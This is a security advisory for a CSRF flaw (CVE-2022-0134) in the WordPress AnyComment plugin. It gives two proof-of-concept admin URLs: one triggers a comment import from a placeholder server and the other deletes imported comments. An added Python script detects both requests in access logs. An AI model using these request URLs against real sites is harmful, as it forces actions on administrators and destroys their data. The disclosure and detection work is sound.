Arbitrary HyperComments Import/Revert CSRF on AnyComment < 0.2.18
Title | Published | Family |
---|---|---|
CVE-2022-0134 AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF | 21 Feb 2022 10:45 | cvelist |
AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF | 19 Jan 2022 00:00 | wpvulndb |
CVE-2022-0134 | 21 Feb 2022 11:15 | nvd |
Cross site request forgery (csrf) | 21 Feb 2022 11:15 | prion |
WordPress AnyComment plugin <= 0.2.17 - Arbitrary HyperComments Import/Revert via CSRF vulnerability | 19 Jan 2022 00:00 | patchstack |
WordPress Cross-Site Request Forgery Vulnerability (CNVD-2022-25195) | 23 Feb 2022 00:00 | cnvd |
CVE-2022-0134 | 21 Feb 2022 11:15 | cve |
Identify Server-Side Attacks Using Qualys Periscope | 1 Dec 2022 23:11 | qualysblog |
Go to `https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>`. A GET request will then appear in your server's logs, indicating that the import request was made.
To revert the imports (i.e. delete all imported comments): `https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1`
https://www.youtube.com/watch?v=75BH2m8cmPo
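Both requests above are plain GETs to `admin.php`, so they leave a recognisable trace in the web server's access log. The following added example (not from the advisory or the plugin) scans combined-format log lines for them and marks those whose Referer is not the site itself; the sample lines, host names and the `classify`/`scan` names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format up to the Referer field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line, site_host):
    """Return a dict for a HyperComments import/revert request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not target.path.endswith("/wp-admin/admin.php"):
        return None
    query = parse_qs(target.query, keep_blank_values=True)  # decodes %2F
    if query.get("r", [""])[0].lower() != "import/hypercomments":
        return None
    if "revert" in query:
        action = "revert"
    elif "url" in query:
        action = "import"
    else:
        return None  # neither parameter from the advisory's PoC is present
    # A missing Referer ("-") has no hostname and is treated as cross-site.
    cross_site = urlsplit(m["referer"]).hostname != site_host
    return {"ip": m["ip"], "time": m["ts"], "action": action,
            "import_url": query.get("url", [None])[0], "cross_site": cross_site}

def scan(lines, site_host):
    return [hit for hit in (classify(l, site_host) for l in lines) if hit]

# Constructed sample lines (hypothetical hosts and addresses).
SAMPLE_LOG = [
    '198.51.100.4 - - [19/Jan/2022:10:00:01 +0000] "GET /wordpress/wp-admin/'
    'admin.php?r=import%2Fhypercomments&url=http://collector.invalid HTTP/1.1"'
    ' 200 512 "https://forum.invalid/thread/1" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Jan/2022:10:05:09 +0000] "GET /wp-admin/admin.php'
    '?r=import%2Fhypercomments&revert=1 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Jan/2022:10:06:00 +0000] "GET /wp-admin/admin.php'
    '?page=example-settings HTTP/1.1" 200 900'
    ' "https://example.com/wp-admin/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, "example.com"):
        print(hit)
```

A same-site Referer only lowers suspicion; it does not show that the administrator intended the request.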